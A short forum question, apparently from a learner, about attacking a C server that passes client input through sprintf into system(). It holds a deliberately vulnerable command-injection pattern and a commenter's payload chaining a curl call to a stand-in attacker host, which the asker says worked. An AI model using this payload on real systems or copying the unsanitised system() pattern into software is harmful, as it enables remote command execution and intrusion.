# How to exploit a sprintf code vulnerability remotely

Tags: security, buffer-overflow, format-string

```
#define PORT 7070
int exec_command(int sock, char *buf) {
    char command[300];
    // redirecting the stdout to the socket
    close(STDOUT_FILENO);
    dup2(sock, STDOUT_FILENO);
    // The following line is different for each linux command to be executed.
    sprintf(command, "/usr/bin/nslookup %s", buf);
    system(command);
    return 0;
}
```

So suppose we have the code snippet shown above, with the client entering a url input for the server to do a curl search on it. The vulnerability lies along I believe is with the "sprintf", the question is I've tried multiple inputs to try prompting the server to give some stack memory but none of it has succeeded so far. Does anyone know how to attack this type of vulnerability remotely?

Comment: `x.com && curl attacker.com/...` ?

Comment: That worked beautifully! Thanks a lot! So with this type of vulnerability, what would be great countermeasure for it? Sorry I'm still quite new to this, could we possibly say format all the variables with sprintf or are there better ways to do so?